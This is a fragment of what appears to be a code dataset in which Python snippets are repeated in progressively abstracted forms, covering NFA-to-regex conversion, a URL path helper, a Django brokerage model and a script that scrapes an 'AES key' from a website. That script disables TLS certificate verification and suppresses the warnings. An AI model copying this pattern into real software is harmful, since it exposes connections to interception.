chars:\n delta_temp[c].remove(dest)\n if len(delta_temp[c]) == 0:\n del delta_temp[c]\n if len(chars) > 1:\n chars = '(' + '+'.join(chars) + ')'\n else:\n chars = '+'.join(chars)\n network.addDelta(src, chars, dest)\n if DEBUG:\n print('Collapsed: ', network)\n pliableNodes = list(network.nodes)\n pliableNodes.remove(network.start)\n for n in network.terminals:\n pliableNodes.remove(n)\n nodeFinalDist = {}\n maxDist = len(network.nodes) ** len(network.nodes)\n for n in network.nodes:\n nodeFinalDist[n] = maxDist\n nodeFinalDist[network.terminals[0]] = 0\n toProcess = list(network.nodes)\n toProcess.remove(network.terminals[0])\n while len(toProcess):\n for node in toProcess:\n dests = network.getDelta(node).values()\n if len(dests) == 0:\n dests = set([])\n else:\n dests = reduce(set.union, network.getDelta(node).values())\n if len(dests) == 0:\n toProcess.remove(node)\n else:\n minDist = min([nodeFinalDist[i] for i in dests])\n if minDist != maxDist:\n nodeFinalDist[node] = minDist + 1\n toProcess.remove(node)\n pliableNodes.sort(key=lambda x: nodeFinalDist[x], reverse=True)\n if DEBUG:\n print('Pliables: ', pliableNodes)\n for node in pliableNodes:\n network.remNode(node)\n delta = copy(network.getDelta(node))\n loops = []\n for input in delta:\n if node in delta[input]:\n if len(input):\n loops.append(input)\n loopRegex = '+'.join(loops)\n if len(loopRegex) > 1 and not (loopRegex[0] == '(' and loopRegex[-1\n ] == ')'):\n loopRegex = '(' + loopRegex + ')*'\n elif len(loopRegex) >= 1:\n loopRegex = loopRegex + '*'\n for input in copy(delta):\n if delta[input] == set([node]):\n del delta[input]\n elif node in delta[input]:\n delta[input].remove(node)\n if '' in delta and (len(delta) != 1 or len(delta['']) != 1):\n eligible = []\n for dest in delta['']:\n delta_temp = network.getDelta(dest)\n if '' in delta_temp and node in delta_temp['']:\n eligible.append(dest)\n if len(eligible):\n replaceNode(network, node, eligible[0])\n continue\n try:\n del network._deltas[node]\n except KeyError:\n continue\n if DEBUG:\n print('Working on connections: ', node, delta)\n deltas_temp = copyDeltas(network._deltas)\n for src in deltas_temp:\n for input in deltas_temp[src]:\n tempDeltaDest = network.getDelta(src)[input]\n if node in tempDeltaDest:\n tempDeltaDest.remove(node)\n if len(tempDeltaDest) == 0:\n network.remDelta(src, input)\n for input2 in delta:\n for dest in delta[input2]:\n if not (src == dest and input + loopRegex +\n input2 == ''):\n network.addDelta(src, input + loopRegex +\n input2, dest)\n if DEBUG:\n print('New Delta:', src, input,\n loopRegex, input2, dest, network)\n branches = network.getDelta(network.start).keys()\n if len(branches) == 1:\n regex = branches[0]\n else:\n prefix = commonprefix(branches)\n suffix = commonsuffix(branches)\n branches = [(i[len(prefix):-len(suffix)] if len(suffix) else i[len(\n prefix):]) for i in branches]\n branches.sort(key=len)\n if len(prefix) or len(suffix):\n regex = prefix + '(' + '+'.join([(i or LAMBDA) for i in branches]\n ) + ')' + suffix\n else:\n regex = '+'.join([(i or LAMBDA) for i in branches]) or PHI\n return regex\n", "<import token>\n<assignment token>\n\n\ndef copyDeltas(src):\n out = dict()\n for k in src:\n out[k] = dict()\n for k2 in src[k]:\n out[k][k2] = copy(src[k][k2])\n return out\n\n\n<function token>\n<function token>\n\n\nclass NetworkNFA(NFA):\n\n def __init__(self, nfa):\n if type(nfa) is not NFA:\n raise AutomataError('Can create a NetworkNFA only from an NFA.')\n if all([(len(i) == 1) for i in nfa.charset]):\n self._charset = copy(nfa._charset)\n else:\n self._charset = set([('{%s}' % i) for i in nfa._charset])\n self._nodes = copy(nfa._nodes)\n self._deltas = copyDeltas(nfa._deltas)\n self._start = nfa._start\n self._terminals = copy(nfa._terminals)\n\n def addDelta(self, node, input, dest):\n if set(input) - self._charset.union(set('()+*')):\n raise AutomataError('%s contains symbols not in charset.' % input)\n if type(node) is Node:\n if type(dest) is set and all([(type(i) is Node) for i in dest]):\n if len(dest):\n if node in self._deltas:\n if input in self._deltas[node]:\n self._deltas[node][input] = self._deltas[node][\n input].union(dest)\n else:\n self._deltas[node][input] = dest\n else:\n self._deltas[node] = {input: dest}\n elif type(dest) is Node:\n if node in self._deltas:\n if input in self._deltas[node]:\n self._deltas[node][input].add(dest)\n else:\n self._deltas[node][input] = set([dest])\n else:\n self._deltas[node] = {input: set([dest])}\n else:\n raise AutomataError(\n 'Delta destination must be a Node or a set of nodes, not %s.'\n % type(dest).__name__)\n else:\n raise AutomataError('Delta source must be Node, not %s.' % type\n (node).__name__)\n\n def remDelta(self, node, input):\n if set(input) - self._charset.union(set('()+*')):\n raise AutomataError('%s contains symbols not in charset.' % input)\n if type(node) is Node:\n if node in self._deltas and input in self._deltas[node]:\n self._deltas[node].pop(input)\n if len(self._deltas[node]) == 0:\n del self._deltas[node]\n else:\n raise AutomataError('Delta source must be a Node, not %s' %\n type(node).__name__)\n\n def isValid(self):\n if len(self._nodes) == 0:\n return False\n if self._start not in self._nodes:\n return False\n for i in self._terminals:\n if i not in self._nodes:\n return False\n if not set(self._deltas.keys()).issubset(self._nodes):\n return False\n for key in self._deltas:\n for char in self._deltas[key]:\n if set(char) - self._charset.union(set('()+*')):\n return False\n return True\n\n def apply(self, input, start):\n raise AutomataError('NetworkNFA does not allow direct application.')\n\n def __repr__(self):\n ret = '<NetworkNFA>\\n'\n ret += ' Charset: {%s}\\n' % ','.join(filter(None, self._charset))\n ret += ' Nodes: {%s}\\n' % ','.join([i.label for i in self._nodes])\n ret += 'Terminals: {%s}\\n' % ','.join([i.label for i in self.\n _terminals])\n ret += ' Start: %s\\n' % (self._start and self._start.label)\n ret += ' Delta: '\n if len(self._deltas):\n for qFrom in self._deltas:\n for input in self._deltas[qFrom]:\n ret += 'D(%s, %s) -> {%s}\\n ' % (qFrom.label, \n input or 'lambda', ','.join([i.label for i in self.\n _deltas[qFrom][input]]))\n ret = ret.rstrip() + '\\n'\n else:\n ret += 'None\\n'\n ret += ' Valid: %s\\n' % ('Yes' if self.isValid() else 'No')\n ret += '</NetworkNFA>'\n return ret\n\n\n<function token>\n", "<import token>\n<assignment token>\n<function token>\n<function token>\n<function token>\n\n\nclass NetworkNFA(NFA):\n\n def __init__(self, nfa):\n if type(nfa) is not NFA:\n raise AutomataError('Can create a NetworkNFA only from an NFA.')\n if all([(len(i) == 1) for i in nfa.charset]):\n self._charset = copy(nfa._charset)\n else:\n self._charset = set([('{%s}' % i) for i in nfa._charset])\n self._nodes = copy(nfa._nodes)\n self._deltas = copyDeltas(nfa._deltas)\n self._start = nfa._start\n self._terminals = copy(nfa._terminals)\n\n def addDelta(self, node, input, dest):\n if set(input) - self._charset.union(set('()+*')):\n raise AutomataError('%s contains symbols not in charset.' % input)\n if type(node) is Node:\n if type(dest) is set and all([(type(i) is Node) for i in dest]):\n if len(dest):\n if node in self._deltas:\n if input in self._deltas[node]:\n self._deltas[node][input] = self._deltas[node][\n input].union(dest)\n else:\n self._deltas[node][input] = dest\n else:\n self._deltas[node] = {input: dest}\n elif type(dest) is Node:\n if node in self._deltas:\n if input in self._deltas[node]:\n self._deltas[node][input].add(dest)\n else:\n self._deltas[node][input] = set([dest])\n else:\n self._deltas[node] = {input: set([dest])}\n else:\n raise AutomataError(\n 'Delta destination must be a Node or a set of nodes, not %s.'\n % type(dest).__name__)\n else:\n raise AutomataError('Delta source must be Node, not %s.' % type\n (node).__name__)\n\n def remDelta(self, node, input):\n if set(input) - self._charset.union(set('()+*')):\n raise AutomataError('%s contains symbols not in charset.' % input)\n if type(node) is Node:\n if node in self._deltas and input in self._deltas[node]:\n self._deltas[node].pop(input)\n if len(self._deltas[node]) == 0:\n del self._deltas[node]\n else:\n raise AutomataError('Delta source must be a Node, not %s' %\n type(node).__name__)\n\n def isValid(self):\n if len(self._nodes) == 0:\n return False\n if self._start not in self._nodes:\n return False\n for i in self._terminals:\n if i not in self._nodes:\n return False\n if not set(self._deltas.keys()).issubset(self._nodes):\n return False\n for key in self._deltas:\n for char in self._deltas[key]:\n if set(char) - self._charset.union(set('()+*')):\n return False\n return True\n\n def apply(self, input, start):\n raise AutomataError('NetworkNFA does not allow direct application.')\n\n def __repr__(self):\n ret = '<NetworkNFA>\\n'\n ret += ' Charset: {%s}\\n' % ','.join(filter(None, self._charset))\n ret += ' Nodes: {%s}\\n' % ','.join([i.label for i in self._nodes])\n ret += 'Terminals: {%s}\\n' % ','.join([i.label for i in self.\n _terminals])\n ret += ' Start: %s\\n' % (self._start and self._start.label)\n ret += ' Delta: '\n if len(self._deltas):\n for qFrom in self._deltas:\n for input in self._deltas[qFrom]:\n ret += 'D(%s, %s) -> {%s}\\n ' % (qFrom.label, \n input or 'lambda', ','.join([i.label for i in self.\n _deltas[qFrom][input]]))\n ret = ret.rstrip() + '\\n'\n else:\n ret += 'None\\n'\n ret += ' Valid: %s\\n' % ('Yes' if self.isValid() else 'No')\n ret += '</NetworkNFA>'\n return ret\n\n\n<function token>\n", "<import token>\n<assignment token>\n<function token>\n<function token>\n<function token>\n\n\nclass NetworkNFA(NFA):\n\n def __init__(self, nfa):\n if type(nfa) is not NFA:\n raise AutomataError('Can create a NetworkNFA only from an NFA.')\n if all([(len(i) == 1) for i in nfa.charset]):\n self._charset = copy(nfa._charset)\n else:\n self._charset = set([('{%s}' % i) for i in nfa._charset])\n self._nodes = copy(nfa._nodes)\n self._deltas = copyDeltas(nfa._deltas)\n self._start = nfa._start\n self._terminals = copy(nfa._terminals)\n\n def addDelta(self, node, input, dest):\n if set(input) - self._charset.union(set('()+*')):\n raise AutomataError('%s contains symbols not in charset.' % input)\n if type(node) is Node:\n if type(dest) is set and all([(type(i) is Node) for i in dest]):\n if len(dest):\n if node in self._deltas:\n if input in self._deltas[node]:\n self._deltas[node][input] = self._deltas[node][\n input].union(dest)\n else:\n self._deltas[node][input] = dest\n else:\n self._deltas[node] = {input: dest}\n elif type(dest) is Node:\n if node in self._deltas:\n if input in self._deltas[node]:\n self._deltas[node][input].add(dest)\n else:\n self._deltas[node][input] = set([dest])\n else:\n self._deltas[node] = {input: set([dest])}\n else:\n raise AutomataError(\n 'Delta destination must be a Node or a set of nodes, not %s.'\n % type(dest).__name__)\n else:\n raise AutomataError('Delta source must be Node, not %s.' % type\n (node).__name__)\n\n def remDelta(self, node, input):\n if set(input) - self._charset.union(set('()+*')):\n raise AutomataError('%s contains symbols not in charset.' % input)\n if type(node) is Node:\n if node in self._deltas and input in self._deltas[node]:\n self._deltas[node].pop(input)\n if len(self._deltas[node]) == 0:\n del self._deltas[node]\n else:\n raise AutomataError('Delta source must be a Node, not %s' %\n type(node).__name__)\n\n def isValid(self):\n if len(self._nodes) == 0:\n return False\n if self._start not in self._nodes:\n return False\n for i in self._terminals:\n if i not in self._nodes:\n return False\n if not set(self._deltas.keys()).issubset(self._nodes):\n return False\n for key in self._deltas:\n for char in self._deltas[key]:\n if set(char) - self._charset.union(set('()+*')):\n return False\n return True\n\n def apply(self, input, start):\n raise AutomataError('NetworkNFA does not allow direct application.')\n <function token>\n\n\n<function token>\n", "<import token>\n<assignment token>\n<function token>\n<function token>\n<function token>\n\n\nclass NetworkNFA(NFA):\n\n def __init__(self, nfa):\n if type(nfa) is not NFA:\n raise AutomataError('Can create a NetworkNFA only from an NFA.')\n if all([(len(i) == 1) for i in nfa.charset]):\n self._charset = copy(nfa._charset)\n else:\n self._charset = set([('{%s}' % i) for i in nfa._charset])\n self._nodes = copy(nfa._nodes)\n self._deltas = copyDeltas(nfa._deltas)\n self._start = nfa._start\n self._terminals = copy(nfa._terminals)\n\n def addDelta(self, node, input, dest):\n if set(input) - self._charset.union(set('()+*')):\n raise AutomataError('%s contains symbols not in charset.' % input)\n if type(node) is Node:\n if type(dest) is set and all([(type(i) is Node) for i in dest]):\n if len(dest):\n if node in self._deltas:\n if input in self._deltas[node]:\n self._deltas[node][input] = self._deltas[node][\n input].union(dest)\n else:\n self._deltas[node][input] = dest\n else:\n self._deltas[node] = {input: dest}\n elif type(dest) is Node:\n if node in self._deltas:\n if input in self._deltas[node]:\n self._deltas[node][input].add(dest)\n else:\n self._deltas[node][input] = set([dest])\n else:\n self._deltas[node] = {input: set([dest])}\n else:\n raise AutomataError(\n 'Delta destination must be a Node or a set of nodes, not %s.'\n % type(dest).__name__)\n else:\n raise AutomataError('Delta source must be Node, not %s.' % type\n (node).__name__)\n\n def remDelta(self, node, input):\n if set(input) - self._charset.union(set('()+*')):\n raise AutomataError('%s contains symbols not in charset.' % input)\n if type(node) is Node:\n if node in self._deltas and input in self._deltas[node]:\n self._deltas[node].pop(input)\n if len(self._deltas[node]) == 0:\n del self._deltas[node]\n else:\n raise AutomataError('Delta source must be a Node, not %s' %\n type(node).__name__)\n <function token>\n\n def apply(self, input, start):\n raise AutomataError('NetworkNFA does not allow direct application.')\n <function token>\n\n\n<function token>\n", "<import token>\n<assignment token>\n<function token>\n<function token>\n<function token>\n\n\nclass NetworkNFA(NFA):\n <function token>\n\n def addDelta(self, node, input, dest):\n if set(input) - self._charset.union(set('()+*')):\n raise AutomataError('%s contains symbols not in charset.' % input)\n if type(node) is Node:\n if type(dest) is set and all([(type(i) is Node) for i in dest]):\n if len(dest):\n if node in self._deltas:\n if input in self._deltas[node]:\n self._deltas[node][input] = self._deltas[node][\n input].union(dest)\n else:\n self._deltas[node][input] = dest\n else:\n self._deltas[node] = {input: dest}\n elif type(dest) is Node:\n if node in self._deltas:\n if input in self._deltas[node]:\n self._deltas[node][input].add(dest)\n else:\n self._deltas[node][input] = set([dest])\n else:\n self._deltas[node] = {input: set([dest])}\n else:\n raise AutomataError(\n 'Delta destination must be a Node or a set of nodes, not %s.'\n % type(dest).__name__)\n else:\n raise AutomataError('Delta source must be Node, not %s.' % type\n (node).__name__)\n\n def remDelta(self, node, input):\n if set(input) - self._charset.union(set('()+*')):\n raise AutomataError('%s contains symbols not in charset.' % input)\n if type(node) is Node:\n if node in self._deltas and input in self._deltas[node]:\n self._deltas[node].pop(input)\n if len(self._deltas[node]) == 0:\n del self._deltas[node]\n else:\n raise AutomataError('Delta source must be a Node, not %s' %\n type(node).__name__)\n <function token>\n\n def apply(self, input, start):\n raise AutomataError('NetworkNFA does not allow direct application.')\n <function token>\n\n\n<function token>\n", "<import token>\n<assignment token>\n<function token>\n<function token>\n<function token>\n\n\nclass NetworkNFA(NFA):\n <function token>\n\n def addDelta(self, node, input, dest):\n if set(input) - self._charset.union(set('()+*')):\n raise AutomataError('%s contains symbols not in charset.' % input)\n if type(node) is Node:\n if type(dest) is set and all([(type(i) is Node) for i in dest]):\n if len(dest):\n if node in self._deltas:\n if input in self._deltas[node]:\n self._deltas[node][input] = self._deltas[node][\n input].union(dest)\n else:\n self._deltas[node][input] = dest\n else:\n self._deltas[node] = {input: dest}\n elif type(dest) is Node:\n if node in self._deltas:\n if input in self._deltas[node]:\n self._deltas[node][input].add(dest)\n else:\n self._deltas[node][input] = set([dest])\n else:\n self._deltas[node] = {input: set([dest])}\n else:\n raise AutomataError(\n 'Delta destination must be a Node or a set of nodes, not %s.'\n % type(dest).__name__)\n else:\n raise AutomataError('Delta source must be Node, not %s.' % type\n (node).__name__)\n\n def remDelta(self, node, input):\n if set(input) - self._charset.union(set('()+*')):\n raise AutomataError('%s contains symbols not in charset.' % input)\n if type(node) is Node:\n if node in self._deltas and input in self._deltas[node]:\n self._deltas[node].pop(input)\n if len(self._deltas[node]) == 0:\n del self._deltas[node]\n else:\n raise AutomataError('Delta source must be a Node, not %s' %\n type(node).__name__)\n <function token>\n <function token>\n <function token>\n\n\n<function token>\n", "<import token>\n<assignment token>\n<function token>\n<function token>\n<function token>\n\n\nclass NetworkNFA(NFA):\n <function token>\n\n def addDelta(self, node, input, dest):\n if set(input) - self._charset.union(set('()+*')):\n raise AutomataError('%s contains symbols not in charset.' % input)\n if type(node) is Node:\n if type(dest) is set and all([(type(i) is Node) for i in dest]):\n if len(dest):\n if node in self._deltas:\n if input in self._deltas[node]:\n self._deltas[node][input] = self._deltas[node][\n input].union(dest)\n else:\n self._deltas[node][input] = dest\n else:\n self._deltas[node] = {input: dest}\n elif type(dest) is Node:\n if node in self._deltas:\n if input in self._deltas[node]:\n self._deltas[node][input].add(dest)\n else:\n self._deltas[node][input] = set([dest])\n else:\n self._deltas[node] = {input: set([dest])}\n else:\n raise AutomataError(\n 'Delta destination must be a Node or a set of nodes, not %s.'\n % type(dest).__name__)\n else:\n raise AutomataError('Delta source must be Node, not %s.' % type\n (node).__name__)\n <function token>\n <function token>\n <function token>\n <function token>\n\n\n<function token>\n", "<import token>\n<assignment token>\n<function token>\n<function token>\n<function token>\n\n\nclass NetworkNFA(NFA):\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n\n\n<function token>\n", "<import token>\n<assignment token>\n<function token>\n<function token>\n<function token>\n<class token>\n<function token>\n" ]
false
95
aa579025cacd11486a101b2dc51b5ba4997bf84a
class UrlPath: @staticmethod def combine(*args): result = '' for path in args: result += path if path.endswith('/') else '{}/'.format(path) #result = result[:-1] return result
[ "class UrlPath:\n @staticmethod\n def combine(*args):\n result = ''\n for path in args:\n result += path if path.endswith('/') else '{}/'.format(path)\n #result = result[:-1]\n return result", "class UrlPath:\n\n @staticmethod\n def combine(*args):\n result = ''\n for path in args:\n result += path if path.endswith('/') else '{}/'.format(path)\n return result\n", "class UrlPath:\n <function token>\n", "<class token>\n" ]
false
96
a1304f290e0346e7aa2e22d9c2d3e7f735b1e8e7
# We don't need no stinking models but django likes this file to be there if you are an app
[ "\n# We don't need no stinking models but django likes this file to be there if you are an app\n", "" ]
false
97
368e209f83cc0cade81791c8357e01e7e3f940c8
#!/usr/bin/python3 import requests import urllib3 urllib3.disable_warnings() response = requests.get('https://freeaeskey.xyz', verify=False) data = response.text.encode('utf-8') key = data[data.index(b'<b>')+3:data.index(b'</b>')] print(key.decode('ascii'))
[ "#!/usr/bin/python3\n\nimport requests\nimport urllib3\nurllib3.disable_warnings()\nresponse = requests.get('https://freeaeskey.xyz', verify=False)\ndata = response.text.encode('utf-8')\nkey = data[data.index(b'<b>')+3:data.index(b'</b>')]\nprint(key.decode('ascii'))\n\n", "import requests\nimport urllib3\nurllib3.disable_warnings()\nresponse = requests.get('https://freeaeskey.xyz', verify=False)\ndata = response.text.encode('utf-8')\nkey = data[data.index(b'<b>') + 3:data.index(b'</b>')]\nprint(key.decode('ascii'))\n", "<import token>\nurllib3.disable_warnings()\nresponse = requests.get('https://freeaeskey.xyz', verify=False)\ndata = response.text.encode('utf-8')\nkey = data[data.index(b'<b>') + 3:data.index(b'</b>')]\nprint(key.decode('ascii'))\n", "<import token>\nurllib3.disable_warnings()\n<assignment token>\nprint(key.decode('ascii'))\n", "<import token>\n<code token>\n<assignment token>\n<code token>\n" ]
false
98
57516a17c1f3ee208076852369999d74dbb2b3ba
def helloWorld(): print "We are in DEMO land!" for i in range(10): helloWorld() print listBuilder() def listBuilder(): b = [] for x in range(5): b.append(10 * x) return b print "[done, for real]"
[ "def helloWorld():\n print \"We are in DEMO land!\"\n\nfor i in range(10):\n helloWorld()\nprint listBuilder()\n\ndef listBuilder():\n b = []\n for x in range(5):\n b.append(10 * x)\n return b\n\nprint \"[done, for real]\"\n" ]
true
99
174f744b641ee20272713fa2fe1991cb2c76830a
from django.db import models class Brokerage(models.Model): BrokerageName = models.CharField(max_length=500) #To-Do Fix additional settings for ImagesFields/FileFields #BrokerageLogo = ImageField ReviewLink = models.CharField(max_length=1000) ContactLink = models.CharField(max_length=1000) TotalAgents = models.IntegerField() Location = models.CharField(max_length=500) Desks = models.IntegerField() YearlyCosts = models.DecimalField(max_digits=12, decimal_places=2) CommisionSplit = models.CharField (max_length=8) #To-Do set a getter for Cap that returns none Cap = models.DecimalField(max_digits=12, decimal_places=2) TrainingPerWeek = models.IntegerField() Onboarding = models.BooleanField() Mentorship = models.BooleanField() Teams_Hiring = models.BooleanField() Marketing = models.CharField(max_length=500) TotalListings = models.IntegerField() ConferenceRooms = models.BooleanField() OfficeLeaders = models.CharField (max_length=500) #OfficeLeaderPhoto = models.ImageField
[ "from django.db import models\n\nclass Brokerage(models.Model):\n\tBrokerageName = models.CharField(max_length=500)\n\t#To-Do Fix additional settings for ImagesFields/FileFields\n\t#BrokerageLogo = ImageField\n\tReviewLink = models.CharField(max_length=1000)\n\tContactLink = models.CharField(max_length=1000)\n\tTotalAgents = models.IntegerField()\n\tLocation = models.CharField(max_length=500)\n\tDesks = models.IntegerField()\n\tYearlyCosts = models.DecimalField(max_digits=12, decimal_places=2)\n\tCommisionSplit = models.CharField (max_length=8)\n\t#To-Do set a getter for Cap that returns none\n\tCap = models.DecimalField(max_digits=12, decimal_places=2)\n\tTrainingPerWeek = models.IntegerField()\n\tOnboarding = models.BooleanField()\n\tMentorship = models.BooleanField()\n\tTeams_Hiring = models.BooleanField()\n\tMarketing = models.CharField(max_length=500)\n\tTotalListings = models.IntegerField()\n\tConferenceRooms = models.BooleanField()\n\tOfficeLeaders = models.CharField (max_length=500)\n\t#OfficeLeaderPhoto = models.ImageField\n\n", "from django.db import models\n\n\nclass Brokerage(models.Model):\n BrokerageName = models.CharField(max_length=500)\n ReviewLink = models.CharField(max_length=1000)\n ContactLink = models.CharField(max_length=1000)\n TotalAgents = models.IntegerField()\n Location = models.CharField(max_length=500)\n Desks = models.IntegerField()\n YearlyCosts = models.DecimalField(max_digits=12, decimal_places=2)\n CommisionSplit = models.CharField(max_length=8)\n Cap = models.DecimalField(max_digits=12, decimal_places=2)\n TrainingPerWeek = models.IntegerField()\n Onboarding = models.BooleanField()\n Mentorship = models.BooleanField()\n Teams_Hiring = models.BooleanField()\n Marketing = models.CharField(max_length=500)\n TotalListings = models.IntegerField()\n ConferenceRooms = models.BooleanField()\n OfficeLeaders = models.CharField(max_length=500)\n", "<import token>\n\n\nclass Brokerage(models.Model):\n BrokerageName = models.CharField(max_length=500)\n ReviewLink = models.CharField(max_length=1000)\n ContactLink = models.CharField(max_length=1000)\n TotalAgents = models.IntegerField()\n Location = models.CharField(max_length=500)\n Desks = models.IntegerField()\n YearlyCosts = models.DecimalField(max_digits=12, decimal_places=2)\n CommisionSplit = models.CharField(max_length=8)\n Cap = models.DecimalField(max_digits=12, decimal_places=2)\n TrainingPerWeek = models.IntegerField()\n Onboarding = models.BooleanField()\n Mentorship = models.BooleanField()\n Teams_Hiring = models.BooleanField()\n Marketing = models.CharField(max_length=500)\n TotalListings = models.IntegerField()\n ConferenceRooms = models.BooleanField()\n OfficeLeaders = models.CharField(max_length=500)\n", "<import token>\n\n\nclass Brokerage(models.Model):\n <assignment token>\n <assignment token>\n <assignment token>\n <assignment token>\n <assignment token>\n <assignment token>\n <assignment token>\n <assignment token>\n <assignment token>\n <assignment token>\n <assignment token>\n <assignment token>\n <assignment token>\n <assignment token>\n <assignment token>\n <assignment token>\n <assignment token>\n", "<import token>\n<class token>\n" ]
false